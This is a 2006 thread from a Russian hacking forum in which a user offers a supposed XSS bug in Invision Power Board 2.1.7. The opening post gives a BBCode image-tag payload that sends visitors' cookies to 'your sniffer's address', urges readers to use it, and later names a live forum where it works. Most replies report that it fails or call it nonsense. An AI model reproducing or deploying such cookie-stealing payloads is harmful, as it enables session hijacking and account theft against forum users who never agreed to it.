Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Ура! Я вродь нашёл баг в Ipb 2.1.7 (https://forum.antichat.xyz/showthread.php?t=24974)

~Real F@ck!~ 06.10.2006 18:32

Ура! Я вродь нашёл баг в Ipb 2.1.7
 
Короче роюсь я роюсь в своём форуме и нашёл баг-
Код:

[warn][img]j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg[/img][/warn]
Если у кого он сработает и если я кому помог тогда жду +++ ! =) :D

И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи!

==================

Цитата:

Сообщение от Модератора
Учимся соединять свой посты или продолжаем получать минусы !

==================

Fr-Ron 06.10.2006 20:10

"Динамические страницы в тэгах [img] запрещены"

Боюсь такой же ответ ждет на большинстве форумов.

Micr0b 06.10.2006 20:14

угу

Twiddle 07.10.2006 05:42

Неа, не катит... А жаль.. =(

blackybr 07.10.2006 08:16

покажи конкретный 2.1.7 где ты это нашел. т.к. это бред..

~Real F@ck!~ 07.10.2006 11:53

blackybr forum.angelz.ru ток чур неломать а то мне капут!

WEB'er 07.10.2006 12:11

Эта бага зависит от настроек форума, я так думаю. И очень мало форумов удасться сломать :(

Bayazid 07.10.2006 13:01

У меня не сработала...(

_GaLs_ 07.10.2006 13:08

Наврядли у кого будет это работать. Почти ва всех форумах [img] запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело!
За старание можно поставить +)

-Concord- 07.10.2006 15:29

Всё просто, но не везде идёт. я этим давно пользовался.


Время: 17:52